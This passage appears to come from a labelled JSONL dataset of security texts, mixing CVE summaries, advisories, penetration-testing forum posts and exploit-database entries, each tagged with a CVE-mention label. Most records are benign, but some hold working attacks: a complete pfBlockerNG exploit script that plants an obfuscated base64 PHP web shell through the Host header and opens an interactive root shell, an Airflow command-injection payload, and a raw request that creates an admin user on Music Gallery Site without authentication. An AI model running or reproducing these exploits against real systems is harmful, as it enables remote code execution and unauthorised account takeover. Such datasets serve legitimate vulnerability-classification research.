insecure file and folder permissions are set, and this could\nallow a malicious user to manipulate file content (e.g.: changing the\ncode of html pages or js scripts) or change legitimate files (e.g.\nSetup-RemoteWork-Client.exe) in order to compromise a system or to gain\nelevated privileges.\n\nThis is the list of insecure files and folders with their respective\npermissions:\n\nPermission: Everyone:(OI)(CI)(F)\n\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\cgi-bin\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\download\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\downloads\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\prints\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\var\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\cgi-bin\\remoteapp\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\downloads\\shared\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\js\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\imgs\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\jwres\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\locales\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\own\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\imgs\\des\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\imgs\\key\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\imgs\\topmenu\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\imgs\\key\\parts\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\img\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\third\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\img\\cp\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\img\\srv\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\third\\images\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\third\\js\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\third\\images\\bramus\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\third\\js\\prototype\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\var\\log\n\n-------------------------------------------------------------------------------------------\n\nPermission: Everyone:(F)\n\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\robots.txt\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\cgi-bin\\hb.exe.config\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\cgi-bin\\SessionPrelaunch.Common.dll.config\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\cgi-bin\\remoteapp\\index.html\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\download\\common.js\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\download\\lang.js\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\download\\Setup-RemoteWork-Client.exe\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\jwres\\jwwebsockify.jar\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\jwres\\web.jar\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\own\\exitlist.html\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html", "source": "exploitdb", "timestamp": "2023-08-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "7a89388bb96e67b605d9", "text": "Something is wrong with this machine, port 9999 is not listening anymore. I started with this fortress a week ago, 9999 was up. But now it’s not. I just voted for the machine reset, it’s been rebooted, but it didn’t help.", "source": "hackthebox", "timestamp": "2023-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "4f488e73a09098d56147", "text": "hussain mujtaba said: ↑ You can use triple quotes to write multiline string or comments.Here is an example Code: string1=''' hello my name is python3 ''' Click to expand...", "source": "go4expert", "timestamp": "2023-12-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3815e56adb1f55ca2aae", "text": "HTB does not explain these modules very well. It is dissapointing. FUZZing is the easiest way, but HTB, again, screws it up by giving a bad example of the command line. ffuf -w ./vhosts -u http://192.168.10.10 -H \"HOST: FUZZ.randomtarget.com\" -fs 612 of course you should insert the correct host and your target IP which will look something like this... ffuf -w ./vhosts -u http://10.129.42.195 -H \"HOST: FUZZ.inlanefreight.htb\" -fs 612 but this still doesnt work even though it is HTB's example. What they dont tell you is to totally eliminate the ./vhost and relace that with the given wordlist in the module. It will look like this... ffuf -w /opt/useful/SecLists/Discovery/DNS/namelist.txt -u http://10.129.42.195 -H \"HOST: FUZZ.inlanefreight.htb\" -fs 612 remember, use your target ip for this. Mine is just an example. And the word list works. Your output will show many lines. Look for the ones that appear \"different\" Then use curl curl -s http://10.129.42.195 -H \"Host: ******.inlanefreight.htb\" The ***** is the name, for example... curl -s http://10.129.42.195 -H \"Host: accounts.inlanefreight.htb\" The rest is on you.", "source": "hackthebox", "timestamp": "2022-12-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "082fc103a75dcd032354", "text": "I tried a lot and got stuck at one injection trick which says that the moving permission is denied. Any further insight you have for me on this, please.", "source": "hackthebox", "timestamp": "2023-12-29", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "66cc483f12ca18c15179", "text": "Hi, I am on the skills assessment and am quite stuck from the start… I am attempting to brute force support login, with a 30 sec dely between each req to prevent the lockout and trying to decode the cookie but I am stuck on that as well. any hints? happy to talk over dm’s or discord. Thanks!", "source": "hackthebox", "timestamp": "2022-07-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "c841f359d0d541ec8e97", "text": "pen testing an OLD 2007 de-ice s1.100 system \n\nOk, so i am pen testing an old VM that was built for testing against. The scenero is that im “hired” by the ceo to brute force the network. according to the book i have by Thomas Welhelm, once you use hydra to get the username and password combo, you can now ssh intl the box via ssh bbanter@192.168.1.100 from here its supposed to ask for the password and then i can further enumerate the system… BUT here is the issue. since i am using parrot os and its 2023 and not 2007, i cant ssh into the system do to this error: Unable to negotiate with 192.168.1.100 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1 to verify that i can login, i went to the 2007 de-ice s1.100 box (192.168.1.100) and ssh’ed into itself just fine with no errors. This box was ment to be tested against with backtrack 2 hahaha. i also tried `ssh -o KexAlgorithms=diffe-hellman-group-sha1 bbanter@192.168.1.100 with no luck How do i get this working? thanks", "source": "parrotsec", "timestamp": "2023-06-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "2ccb87949751e455dc01", "text": "Yes, I am also stuck at flag4. I pivoted to user Barry, who is adm group member. Found nothing in the logs. To read flag4, tomcat user privileges are required. I have no idea where to go from here. Pivot to tomcat service role?", "source": "hackthebox", "timestamp": "2022-01-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "d8c89976e833ca1fe231", "text": "[Command Injection - Generic] CVE-2022-38362: Apache Airflow Docker Provider <3.0 RCE vulnerability in example dag\n\nApache Airflow Docker's Provider shipped with an example DAG that was vulnerable to (authenticated) remote code exploit of code on the Airflow worker host.\n\n##Vulnerability summary:\nIn DAG script of airflow 2.3.3, there is a command injection vulnerability (RCE) in the script (example_docker_copy_data.py of docker provider), which can obtain the permission of the operating system. \n\nsource path: \nairflow-2.3.3/airflow/providers/docker/example_dags/example_docker_copy_data.py\n\n##Vulnerability details:\n(1) Vulnerability principle:\n1. It can be seen from the source code of example_docker_copy_data.py script that there is the function of executing bash command, The parameter ‘source_location’ in the template expression {{params.source_location}} is externally controllable and rendered through the jiaja2 template: \n\n{F1869746}\n\n2. Further analysis “from airflow.operators.bash import BashOperator” code, we can see bash_command parameter value will be executed as a bash script;\n\n{F1869748}\n\n(2)Vulnerability exploit:\n1. Enter the DAGs menu and start docker_sample_copy_data task, select “Trigger DAG w/ config”. \n\nhttp://192.168.3.17:8080/trigger?dag_id=docker_sample_copy_data\n\n{F1869749}\n\n2. To construct payload, we can separate commands with ‘;’, so as to inject any operating system commands to be executed(RCE).\n\n{F1869750}\n\nPAYLOAD:```{\"source_location\":\";touch /tmp/thisistest;\"}```, Then click trigger to execute the task.\n\n{F1869755}\n\nThe final command is as follows:\n```locate_file_cmd = “”” sleep 10\nfind ;touch /tmp/thisistest; -type f -printf “%f\\n” | head -1\n“””\n```\n\nThrough the log and server view, it can be seen that arbitrary command has been executed successfully.\n\n{F1869756}\n\n{F1869757}\n\n## Impact\n\nAn attacker can execute arbitrary commands on the airflow host.", "source": "hackerone", "timestamp": "2022-09-23", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "29e59b5a924213ed37f9", "text": "CVE: CVE-2022-2015\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository jgraph/drawio prior to 19.0.2.'}]\n\nFix commit: 19.0.2 release", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "8214167dbebc0059a93b", "text": "CVE: CVE-2022-22116\n\n[{'lang': 'en', 'value': 'In Directus, versions 9.0.0-alpha.4 through 9.4.1 are vulnerable to stored Cross-Site Scripting (XSS) vulnerability via SVG file upload in media upload functionality. A low privileged attacker can inject arbitrary javascript code which will be executed in a victim’s browser when they open the image URL.'}]\n\nFix commit: Add Content-Security-Policy header by default (#10776)", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "6792667b437158980662", "text": "CVE: CVE-2022-2713\n\n[{'lang': 'en', 'value': 'Insufficient Session Expiration in GitHub repository cockpit-hq/cockpit prior to 2.2.0.'}]\n\nFix commit: Stop execution of code after redirecting", "source": "cvefixes", "timestamp": "2022-08-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "5bcb65140b7fafbfeb0b", "text": "Improper Input Validation in Xerces\n\n[Severity: MEDIUM]\n\nA flaw was found in Wildfly's implementation of Xerces, specifically in the way the XMLSchemaValidator class in the JAXP component of Wildfly enforced the \"use-grammar-pool-only\" feature. This flaw allows a specially-crafted XML file to manipulate the validation process in certain cases. This issue is the same flaw as CVE-2020-14621, which affected OpenJDK, and uses a similar code. All xerces jboss versions before 2.12.0.SP3.", "source": "github_advisory", "timestamp": "2022-02-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "97cec687c2505632bb1e", "text": "The Importance of Web Development in Digital Marketing\n\nIn today's fast-paced environment, many people are removing the old-fashioned marketing model. They have introduced digital marketing that is cost-effective and simple to access. It's the ideal way to reach a broad crowd in one go. Web development is a part of digital marketing and can help businesses increase their exposure and earn more money. Web development services allow you to expand your business efficiently and efficiently. It is a highly-specialized field of digital marketing that can be profitable. Web development content is essential in developing your business, as a thorough study is necessary for digital marketing. This content also offers the correct information about digital marketing to the readers.", "source": "go4expert", "timestamp": "2023-03-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3ef346cddb10b893ffa8", "text": "CVE: CVE-2021-3155\n\n[{'lang': 'en', 'value': 'snapd 2.54.2 and earlier created ~/snap directories in user home directories without specifying owner-only permissions. This could allow a local attacker to read information that should have been private. Fixed in snapd versions 2.54.3+18.04, 2.54.3+20.04 and 2.54.3+21.10.1'}]\n\nFix commit: Merge pull request #9897 from anonymouse64/bugfix/lp-1910298-part-1\n\nusersession/autostart: change ~/snap perms to 0700 on startup", "source": "cvefixes", "timestamp": "2022-02-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "3159cfa0b9c72db6a6e3", "text": "It’s one of those assignments that takes a couple of tries. I wasn’t sure how the php code in the module example was creating the hashes, so i got to an online php sandbox an experimented with a couple of lines of codes to figure it out. After having some ideas, modified the module’s python script to compute the hashes for the htbuser user and compared it with the one generated in the question page. Once i got a hit, it confirmed the way it was computing the hashes. Modified the script it to htbadmin user, got it running and pressed the button to generate the token again. Then it was just a matter of waiting.", "source": "hackthebox", "timestamp": "2023-12-09", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "b5d29ef7c000785012e7", "text": "CVE: CVE-2022-28044\n\n[{'lang': 'en', 'value': 'Irzip v0.640 was discovered to contain a heap memory corruption via the component lrzip.c:initialise_control.'}]\n\nFix commit: Fix control->suffix being deallocated as heap memory as reported by Pietro Borrello.", "source": "cvefixes", "timestamp": "2022-04-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c59281d77b12bb23b366", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nThe Chakra JavaScript engine in Microsoft Edge allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka \"Scripting Engine Memory Corruption Vulnerability,\" a different vulnerability than CVE-2016-0191 and CVE-2016-0193.", "source": "github_advisory", "timestamp": "2022-05-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "a2b873b618ca21077b44", "text": "Music Gallery Site v1.0 - Broken Access Control\n\n# Exploit Title: Music Gallery Site v1.0 - Broken Access Control\n# Exploit Author: Muhammad Navaid Zafar Ansari\n# Date: 21 February 2023\n\n### CVE Assigned:\n**[CVE-2023-0963](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0963)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0963) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0963)\n\n### Vendor Homepage:\n> https://www.sourcecodester.com\n### Software Link:\n> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)\n### Version:\n> v 1.0\n\n# Tested on: Windows 11\n\n### Broken Authentication:\n> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.\n\n### Vulnerable URLs:\n> /php-music/classes/Users.php\n\n>/php-music/classes/Master.php\n\n### Affected Page:\n> Users.php , Master.php\n> On these page, application isn't verifying the authenticated mechanism. Due to that, all the parameters are vulnerable to broken access control and any remote attacker could create and update the data into the application. Specifically, Users.php could allow to remote attacker to create a admin user without log-in to the application.\n### Description:\n> Broken access control allows any remote attacker to create, update and delete the data of the application. Specifically, adding the admin users\n### Proof of Concept:\n> Following steps are involved:\n1. Send a POST request with required parameter to Users.php?f=save (See Below Request)\n\n2. Request:\n```\nPOST /php-music/classes/Users.php?f=save HTTP/1.1\nHost: localhost\nContent-Length: 876\nsec-ch-ua: \"Not?A_Brand\";v=\"8\", \"Chromium\";v=\"108\"\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryjwBNagY7zt6cjYHp\nX-Requested-With: XMLHttpRequest\nsec-ch-ua-mobile: ?0\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36\nsec-ch-ua-platform: \"Linux\"\nOrigin: http://localhost\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nReferer: http://localhost/php-music/admin/?page=user/manage_user\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nConnection: close\n\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"id\"\n\n\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"firstname\"\n\nTest\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"middlename\"\n\nAdmin\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"lastname\"\n\nCheck\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"username\"\n\ntestadmin\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"password\"\n\ntest123\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"type\"\n\n1\n------WebKitFormBoundaryjwBNagY7zt6cjYHp\nContent-Disposition: form-data; name=\"img\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryjwBNagY7zt6cjYHp--\n\n```\n\n3. It will create the user by defining the valid values (see below screenshot of successfull response), Successful exploit screenshots are below (without cookie parameter)\n\n![image](https://user-images.githubusercontent.com/123810418/220352229-389dfaf8-57e0-470d-b8a5-c873a13b3b51.png)\n\n![image](https://user-images.githubusercontent.com/123810418/220352493-ef35a8ba-c613-4745-9004-0159b3841951.png)\n\n4. Vulnerable Code Snippets:\n\nUsers.php\n\n![image](https://user-images.githubusercontent.com/123810418/220353008-b1448508-7451-412a-a5eb-049aa20b3d41.png)\n\nMaster.php\n\n![image](https://user-images.git", "source": "exploitdb", "timestamp": "2023-04-06", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "2216c7313c6ce3d156ad", "text": "automotive car utils\n\nis it possible to use something from the car utils to clear fault codes from a car? would really appreciate any help or guidance about materials to help learn. thanks", "source": "parrotsec", "timestamp": "2022-11-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "9fc4d95a9f3756624d51", "text": "CVE: CVE-2021-40592\n\n[{'lang': 'en', 'value': \"GPAC version before commit 71460d72ec07df766dab0a4d52687529f3efcf0a (version v1.0.1 onwards) contains loop with unreachable exit condition ('infinite loop') vulnerability in ISOBMFF reader filter, isoffin_read.c. Function isoffin_process() can result in DoS by infinite loop. To exploit, the victim must open a specially crafted mp4 file.\"}]\n\nFix commit: fixed #1876", "source": "cvefixes", "timestamp": "2022-06-08", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "4bab4ec7cdf1bce563a9", "text": "pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)\n\n# Exploit Title: pfBlockerNG 2.1.4_26 - Remote Code Execution (RCE)\n# Shodan Results: https://www.shodan.io/search?query=http.title%3A%22pfSense+-+Login%22+%22Server%3A+nginx%22+%22Set-Cookie%3A+PHPSESSID%3D%22\n# Date: 5th of September 2022\n# Exploit Author: IHTeam\n# Vendor Homepage: https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html\n# Software Link: https://github.com/pfsense/FreeBSD-ports/pull/1169\n# Version: 2.1.4_26\n# Tested on: pfSense 2.6.0\n# CVE : CVE-2022-31814\n# Original Advisory: https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/\n\n#!/usr/bin/env python3\nimport argparse\nimport requests\nimport time\nimport sys\nimport urllib.parse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nparser = argparse.ArgumentParser(description=\"pfBlockerNG <= 2.1.4_26 Unauth RCE\")\nparser.add_argument('--url', action='store', dest='url', required=True, help=\"Full URL and port e.g.: https://192.168.1.111:443/\")\nargs = parser.parse_args()\n\nurl = args.url\nshell_filename = \"system_advanced_control.php\"\n\ndef check_endpoint(url):\n\tresponse = requests.get('%s/pfblockerng/www/index.php' % (url), verify=False)\n\tif response.status_code == 200:\n\t\tprint(\"[+] pfBlockerNG is installed\")\n\telse:\n\t\tprint(\"\\n[-] pfBlockerNG not installed\")\n\t\tsys.exit()\n\ndef upload_shell(url, shell_filename):\n\tpayload = {\"Host\":\"' *; echo 'PD8kYT1mb3BlbigiL3Vzci9sb2NhbC93d3cvc3lzdGVtX2FkdmFuY2VkX2NvbnRyb2wucGhwIiwidyIpIG9yIGRpZSgpOyR0PSc8P3BocCBwcmludChwYXNzdGhydSggJF9HRVRbImMiXSkpOz8+Jztmd3JpdGUoJGEsJHQpO2ZjbG9zZSggJGEpOz8+'|python3.8 -m base64 -d | php; '\"}\n\tprint(\"[/] Uploading shell...\")\n\tresponse = requests.get('%s/pfblockerng/www/index.php' % (url), headers=payload, verify=False)\n\ttime.sleep(2)\n\tresponse = requests.get('%s/system_advanced_control.php?c=id' % (url), verify=False)\n\tif ('uid=0(root) gid=0(wheel)' in str(response.content, 'utf-8')):\n\t\tprint(\"[+] Upload succeeded\")\n\telse:\n\t\tprint(\"\\n[-] Error uploading shell. Probably patched \", response.content)\n\t\tsys.exit()\n\ndef interactive_shell(url, shell_filename, cmd):\n\tresponse = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(cmd, safe='')), verify=False)\n\tprint(str(response.text)+\"\\n\")\n\n\ndef delete_shell(url, shell_filename):\n\tdelcmd = \"rm /usr/local/www/system_advanced_control.php\"\n\tresponse = requests.get('%s/system_advanced_control.php?c=%s' % (url, urllib.parse.quote(delcmd, safe='')), verify=False)\n\tprint(\"\\n[+] Shell deleted\")\n\ncheck_endpoint(url)\nupload_shell(url, shell_filename)\ntry:\n\twhile True:\n\t\tcmd = input(\"# \")\n\t\tinteractive_shell(url, shell_filename, cmd)\nexcept:\n\tdelete_shell(url, shell_filename)", "source": "exploitdb", "timestamp": "2023-02-20", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "373b33edf628fd806bd2", "text": "CVE: CVE-2022-2980\n\n[{'lang': 'en', 'value': 'NULL Pointer Dereference in GitHub repository vim/vim prior to 9.0.0259.'}]\n\nFix commit: patch 9.0.0259: crash with mouse click when not initialized\n\nProblem: Crash with mouse click when not initialized.\nSolution: Check TabPageIdxs[] is not NULL.", "source": "cvefixes", "timestamp": "2022-08-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "02d78ed1ef0c847f2344", "text": "Hello I learned alot using TryHackMe website, it’s 15 Euro per month but worth of it.", "source": "parrotsec", "timestamp": "2023-07-18", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "61eef431efb7944beb1e", "text": "Actually you don’t need a mouse at all to use the system, its Linux you only need a keyboard, but I digress… As it can ‘see’ your mousepad and identifies it correctly, you just need the synaptics packages; sudo apt install xserver-xorg-input-libinput xserver-xorg-input-evdev xserver-xorg-input-mouse xserver-xorg-input-synaptics A reboot should then make it work… But you say you’ve tried this… and… But after I upgraded my ram from 8GB to 16GB. Synaptic touchpad started getting laggy, cursor moves but doesn’t click, even left and right key on touchpad don’t click. would suggest you have disturbed a ribbon cable when you upgraded the RAM or its not quite together properly…", "source": "parrotsec", "timestamp": "2023-03-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "be8b9e81d2e4e52d3399", "text": "Same problem, the question asks only for the switch and the variable and it stays like this “dst host 10.10.20.1” or “dst 10.10.20.1” but with none", "source": "hackthebox", "timestamp": "2022-11-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "f613e41c6b105dc0d361", "text": "CVE: CVE-2022-24845\n\n[{'lang': 'en', 'value': 'Vyper is a pythonic Smart Contract Language for the ethereum virtual machine. In affected versions, the return of `.returns_int128()` is not validated to fall within the bounds of `int128`. This issue can result in a misinterpretation of the integer value and lead to incorrect behavior. As of v0.3.0, `.returns_int128()` is validated in simple expressions, but not complex expressions. Users are advised to upgrade. There is no known workaround for this issue.'}]\n\nFix commit: Merge pull request from GHSA-j2x6-9323-fp7h\n\nThis commit addresses two issues in validating returndata, both related\nto the inferred type of the external call return.\n\nFirst, it addresses an issue with interfaces imported from JSON. The\nJSON_ABI encoding type was added in 0.3.0 as part of the calling\nconvention refactor to mimic the old code's behavior when the signature\nof a function had `is_from_json` toggled to True. However, both\nimplementations were a workaround for the fact that in\nFunctionSignatures from JSON with Bytes return types, length is set to 1\nas a hack to ensure they always typecheck - almost always resulting in a\nruntime revert.\n\nThis commit removes the JSON_ABI encoding type, so that dynamic\nreturndata from an interface defined with .json ABI file cannot result\nin a buffer overrun(!). To avoid the issue with always runtime\nreverting, codegen uses the uses the inferred ContractFunction type of\nthe Call.func member (which is both more accurate than the inferred type\nof the Call expression, and the return type on the FunctionSignature!)\nto calculate the length of the external Bytes array.\n\nSecond, this commit addresses an issue with validating call returns in\ncomplex expressions. In the following examples, the type of the call\nreturn is either inferred incorrectly or it takes a path through codegen\nwhich avoids generating runtime clamps:\n\n```\ninterface Foo:\n def returns_int128() -> int128: view\n def returns_Bytes3() -> Bytes[3]: view\n\nfoo: Foo\n...\nx: uint256 = convert(self.foo.returns_int128(), uint256)\ny: Bytes[32] = concat(self.foo.returns_Bytes3(), b\"\")\n```\n\nTo address this issue, if the type of returndata needs validation, this\ncommit decodes the returndata \"strictly\" into a newly allocated buffer\nat the time of the call, to avoid unvalidated data accidentally getting\ninto the runtime. This does result in extra memory traffic which is a\nperformance hit, but the performance issue can be addressed at a later\ndate with a zero-copy buffering scheme (parent Expr allocates the\nbuffer).\n\nAdditional minor fixes and cleanup:\n- fix compiler panic in new_type_to_old_type for Tuples\n- remove `_should_decode` helper function as it duplicates `needs_clamp`\n- minor optimization in returndatasize check - assert ge uses one fewer\n instruction than assert gt.", "source": "cvefixes", "timestamp": "2022-04-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "f1b68d6bf349c21859cf", "text": "CVE: CVE-2022-21680\n\n[{'lang': 'en', 'value': 'Marked is a markdown parser and compiler. Prior to version 4.0.10, the regular expression `block.def` may cause catastrophic backtracking against some strings and lead to a regular expression denial of service (ReDoS). Anyone who runs untrusted markdown through a vulnerable version of marked and does not use a worker with a time limit may be affected. This issue is patched in version 4.0.10. As a workaround, avoid running untrusted markdown through marked or run marked on a worker thread and set a reasonable time limit to prevent draining resources.'}]\n\nFix commit: Merge pull request from GHSA-rrrm-qjm4-v8hf\n\n* fix: fix reflink redos\n\nCo-authored-by: MakeNowJust \n\n* fix: fix def redos\n\nCo-authored-by: MakeNowJust \n\n* fix block label for multiple slashes\n\nCo-authored-by: MakeNowJust ", "source": "cvefixes", "timestamp": "2022-01-14", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "494cfcee7363853665a7", "text": "protobuf-java has a potential Denial of Service issue\n\n[Severity: MEDIUM]\n\n## Summary\nA potential Denial of Service issue in `protobuf-java` core and lite was discovered in the parsing procedure for binary and text format data. Input streams containing multiple instances of non-repeated [embedded messages](http://developers.google.com/protocol-buffers/docs/encoding#embedded) with repeated or unknown fields causes objects to be converted back-n-forth between mutable and immutable forms, resulting in potentially long garbage collection pauses. \n\nReporter: [OSS Fuzz](https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=48771)\n\nAffected versions: This issue affects both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.\n\n## Severity\n\n[CVE-2022-3171](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3171) Medium - CVSS Score: 5.7 (NOTE: there may be a delay in publication)\n\n## Remediation and Mitigation\n\nPlease update to the latest available versions of the following packages:\n\nprotobuf-java (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-javalite (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-kotlin (3.21.7, 3.20.3, 3.19.6, 3.16.3)\nprotobuf-kotlin-lite (3.21.7, 3.20.3, 3.19.6, 3.16.3)\ngoogle-protobuf [JRuby gem only] (3.21.7, 3.20.3, 3.19.6)\n", "source": "github_advisory", "timestamp": "2022-10-04", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "fd0b2b522a3d5f75d28a", "text": "django-sendfile2 before 0.7.0 contains reflected file download vulnerability\n\n[Severity: HIGH]\n\nSimilar to CVE-2022-36359 for Django, django-sendfile2 did not protect against a reflected file download attack in version 0.6.1 and earlier. If the file name used by django-sendfile2 was derived from user input, then it would be possible to perform a such an attack. A new version of django-sendfile2 will be released. Either download django-sendfile2 0.7.0 as a workaround or sanitize user input yourself, using Django's patch as a template: https://github.com/django/django/commit/bd062445cffd3f6cc6dcd20d13e2abed818fa173", "source": "github_advisory", "timestamp": "2022-08-11", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "c969891c856af4cdb3dc", "text": "CVE: CVE-2022-31624\n\n[{'lang': 'en', 'value': 'MariaDB Server before 10.7 is vulnerable to Denial of Service. While executing the plugin/server_audit/server_audit.c method log_statement_ex, the held lock lock_bigbuffer is not released correctly, which allows local users to trigger a denial of service due to the deadlock.'}]\n\nFix commit: MDEV-26556 An improper locking bug(s) due to unreleased lock.\n\nGet rid of the global big_buffer.", "source": "cvefixes", "timestamp": "2022-05-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"} +{"id": "b7a07ae779cdc6eec5bd", "text": "I really can’t find the second flag no matter what I try.", "source": "hackthebox", "timestamp": "2023-03-28", "split": "val", "label": 0, "label_source": "cross_source_no_cve"} +{"id": "3087ff3b5a999690f57d", "text": "When I tried the 3. command I had a completely different result. My result was 738. The answer was incorrect. Then I just tried to 